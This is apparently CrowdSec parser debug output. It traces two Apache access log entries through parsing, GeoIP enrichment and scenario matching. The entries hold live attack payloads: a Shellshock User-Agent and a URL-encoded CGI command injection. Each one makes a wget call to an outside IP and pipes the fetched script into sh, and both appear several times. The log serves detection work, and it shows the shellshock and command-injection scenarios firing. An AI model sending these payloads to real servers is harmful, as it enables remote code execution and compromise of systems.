line: 45.156.87.165 - - [21/Aug/2025:20:46:22 +0200] "GET / HTTP/1.1" 200 981 "-" "() { :; }; /bin/bash -c \"wget -qO- http://74.194.191.52/rondo.bash.sh|sh&\"" ├ s00-raw | ├ 🔴 crowdsecurity/syslog-logs | └ 🟢 crowdsecurity/non-syslog (+5 ~8) | └ update evt.ExpectMode : %!s(int=0) -> 1 | └ update evt.Stage : -> s01-parse | └ update evt.Line.Raw : -> 45.156.87.165 - - [21/Aug/2025:20:46:22 +0200] "GET / HTTP/1.1" 200 981 "-" "() { :; }; /bin/bash -c \"wget -qO- http://74.194.191.52/rondo.bash.sh|sh&\"" | └ update evt.Line.Src : -> /root/debug.log | └ update evt.Line.Time : 0001-01-01 00:00:00 +0000 UTC -> 2025-08-25 12:48:16.506770581 +0000 UTC | └ create evt.Line.Labels.type : apache2 | └ update evt.Line.Process : %!s(bool=false) -> true | └ update evt.Line.Module : -> file | └ create evt.Parsed.message : 45.156.87.165 - - [21/Aug/2025:20:46:22 +0200] "GET / HTTP/1.1" 200 981 "-" "() { :; }; /bin/bash -c \"wget -qO- http://74.194.191.52/rondo.bash.sh|sh&\"" | └ create evt.Parsed.program : apache2 | └ update evt.Time : 0001-01-01 00:00:00 +0000 UTC -> 2025-08-25 12:48:16.506804811 +0000 UTC | └ create evt.Meta.datasource_path : /root/debug.log | └ create evt.Meta.datasource_type : file ├ s01-parse | └ 🟢 crowdsecurity/apache2-logs (+21 ~2) | └ update evt.Stage : s01-parse -> s02-enrich | └ create evt.Parsed.target_fqdn : | └ create evt.Parsed.clientip : 45.156.87.165 | └ create evt.Parsed.http_user_agent : () { :; }; /bin/bash -c \ | └ create evt.Parsed.port : | └ create evt.Parsed.response : 200 | └ create evt.Parsed.timestamp : 21/Aug/2025:20:46:22 +0200 | └ create evt.Parsed.referrer : - | └ create evt.Parsed.request : / | └ create evt.Parsed.auth : - | └ create evt.Parsed.bytes : 981 | └ create evt.Parsed.httpversion : 1.1 | └ create evt.Parsed.ident : - | └ create evt.Parsed.rawrequest : | └ create evt.Parsed.verb : GET | └ update evt.StrTime : -> 21/Aug/2025:20:46:22 +0200 | └ create evt.Meta.http_user_agent : () { :; }; /bin/bash -c \ | └ create evt.Meta.log_type : http_access-log | └ create evt.Meta.service : http | └ create evt.Meta.source_ip : 45.156.87.165 | └ create evt.Meta.http_path : / | └ create evt.Meta.http_status : 200 | └ create evt.Meta.http_verb : GET ├ s02-enrich | ├ 🟢 crowdsecurity/dateparse-enrich (+2 ~2) | ├ create evt.Enriched.MarshaledTime : 2025-08-21T20:46:22+02:00 | ├ update evt.Time : 2025-08-25 12:48:16.506804811 +0000 UTC -> 2025-08-21 20:46:22 +0200 CEST | ├ update evt.MarshaledTime : -> 2025-08-21T20:46:22+02:00 | ├ create evt.Meta.timestamp : 2025-08-21T20:46:22+02:00 | ├ 🟢 crowdsecurity/geoip-enrich (+13) | ├ create evt.Enriched.ASNOrg : Pfcloud UG | ├ create evt.Enriched.ASNumber : 51396 | ├ create evt.Enriched.IsInEU : true | ├ create evt.Enriched.Latitude : 52.382400 | ├ create evt.Enriched.Longitude : 4.899500 | ├ create evt.Enriched.IsoCode : NL | ├ create evt.Enriched.SourceRange : 45.156.87.0/24 | ├ create evt.Enriched.ASNNumber : 51396 | ├ create evt.Meta.ASNOrg : Pfcloud UG | ├ create evt.Meta.IsoCode : NL | ├ create evt.Meta.SourceRange : 45.156.87.0/24 | ├ create evt.Meta.IsInEU : true | ├ create evt.Meta.ASNNumber : 51396 | ├ 🟢 crowdsecurity/http-logs (+6) | ├ create evt.Parsed.impact_completion : true | ├ create evt.Parsed.file_dir : / | ├ create evt.Parsed.file_frag : | ├ create evt.Parsed.file_ext : | ├ create evt.Parsed.static_ressource : false | ├ create evt.Meta.http_args_len : 0 | ├ 🟢 crowdsecurity/whitelists (unchanged) | └ 🟢 crowdsecurity/public-dns-allowlist (unchanged) ├-------- parser success 🟢 ├ Scenarios ├ 🟢 crowdsecurity/apache-shellshock └ 🟢 crowdsecurity/http-crawl-non_statics line: 45.156.87.165 - - [22/Aug/2025:08:09:07 +0200] "GET /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B HTTP/1.1" 404 457 "-" "Mozilla/5.0 (bang2012@protonmail.com)" ├ s00-raw | ├ 🔴 crowdsecurity/syslog-logs | └ 🟢 crowdsecurity/non-syslog (+5 ~8) | └ update evt.ExpectMode : %!s(int=0) -> 1 | └ update evt.Stage : -> s01-parse | └ update evt.Line.Raw : -> 45.156.87.165 - - [22/Aug/2025:08:09:07 +0200] "GET /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B HTTP/1.1" 404 457 "-" "Mozilla/5.0 (bang2012@protonmail.com)" | └ update evt.Line.Src : -> /root/debug.log | └ update evt.Line.Time : 0001-01-01 00:00:00 +0000 UTC -> 2025-08-25 12:48:16.506793499 +0000 UTC | └ create evt.Line.Labels.type : apache2 | └ update evt.Line.Process : %!s(bool=false) -> true | └ update evt.Line.Module : -> file | └ create evt.Parsed.message : 45.156.87.165 - - [22/Aug/2025:08:09:07 +0200] "GET /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B HTTP/1.1" 404 457 "-" "Mozilla/5.0 (bang2012@protonmail.com)" | └ create evt.Parsed.program : apache2 | └ update evt.Time : 0001-01-01 00:00:00 +0000 UTC -> 2025-08-25 12:48:16.509095314 +0000 UTC | └ create evt.Meta.datasource_path : /root/debug.log | └ create evt.Meta.datasource_type : file ├ s01-parse | └ 🟢 crowdsecurity/apache2-logs (+21 ~2) | └ update evt.Stage : s01-parse -> s02-enrich | └ create evt.Parsed.clientip : 45.156.87.165 | └ create evt.Parsed.timestamp : 22/Aug/2025:08:09:07 +0200 | └ create evt.Parsed.bytes : 457 | └ create evt.Parsed.referrer : - | └ create evt.Parsed.verb : GET | └ create evt.Parsed.http_user_agent : Mozilla/5.0 (bang2012@protonmail.com) | └ create evt.Parsed.httpversion : 1.1 | └ create evt.Parsed.port : | └ create evt.Parsed.request : /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B | └ create evt.Parsed.auth : - | └ create evt.Parsed.ident : - | └ create evt.Parsed.rawrequest : | └ create evt.Parsed.response : 404 | └ create evt.Parsed.target_fqdn : | └ update evt.StrTime : -> 22/Aug/2025:08:09:07 +0200 | └ create evt.Meta.log_type : http_access-log | └ create evt.Meta.service : http | └ create evt.Meta.source_ip : 45.156.87.165 | └ create evt.Meta.http_path : /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B | └ create evt.Meta.http_status : 404 | └ create evt.Meta.http_user_agent : Mozilla/5.0 (bang2012@protonmail.com) | └ create evt.Meta.http_verb : GET ├ s02-enrich | ├ 🟢 crowdsecurity/dateparse-enrich (+2 ~2) | ├ create evt.Enriched.MarshaledTime : 2025-08-22T08:09:07+02:00 | ├ update evt.Time : 2025-08-25 12:48:16.509095314 +0000 UTC -> 2025-08-22 08:09:07 +0200 CEST | ├ update evt.MarshaledTime : -> 2025-08-22T08:09:07+02:00 | ├ create evt.Meta.timestamp : 2025-08-22T08:09:07+02:00 | ├ 🟢 crowdsecurity/geoip-enrich (+13) | ├ create evt.Enriched.ASNOrg : Pfcloud UG | ├ create evt.Enriched.ASNumber : 51396 | ├ create evt.Enriched.IsInEU : true | ├ create evt.Enriched.IsoCode : NL | ├ create evt.Enriched.Longitude : 4.899500 | ├ create evt.Enriched.ASNNumber : 51396 | ├ create evt.Enriched.Latitude : 52.382400 | ├ create evt.Enriched.SourceRange : 45.156.87.0/24 | ├ create evt.Meta.ASNOrg : Pfcloud UG | ├ create evt.Meta.SourceRange : 45.156.87.0/24 | ├ create evt.Meta.IsInEU : true | ├ create evt.Meta.IsoCode : NL | ├ create evt.Meta.ASNNumber : 51396 | ├ 🟢 crowdsecurity/http-logs (+8 ~1) | ├ update evt.Parsed.request : /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B -> /cgi-bin/script | ├ create evt.Parsed.http_args : system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B | ├ create evt.Parsed.impact_completion : false | ├ create evt.Parsed.static_ressource : false | ├ create evt.Parsed.file_frag : script | ├ create evt.Parsed.file_dir : /cgi-bin/ | ├ create evt.Parsed.file_ext : | ├ create evt.Parsed.file_name : script | ├ create evt.Meta.http_args_len : 72 | ├ 🟢 crowdsecurity/whitelists (unchanged) | └ 🟢 crowdsecurity/public-dns-allowlist (unchanged) ├-------- parser success 🟢 ├ Scenarios ├ 🟢 crowdsecurity/cgi-command-injection ├ 🟢 crowdsecurity/http-crawl-non_statics └ 🟢 crowdsecurity/http-probing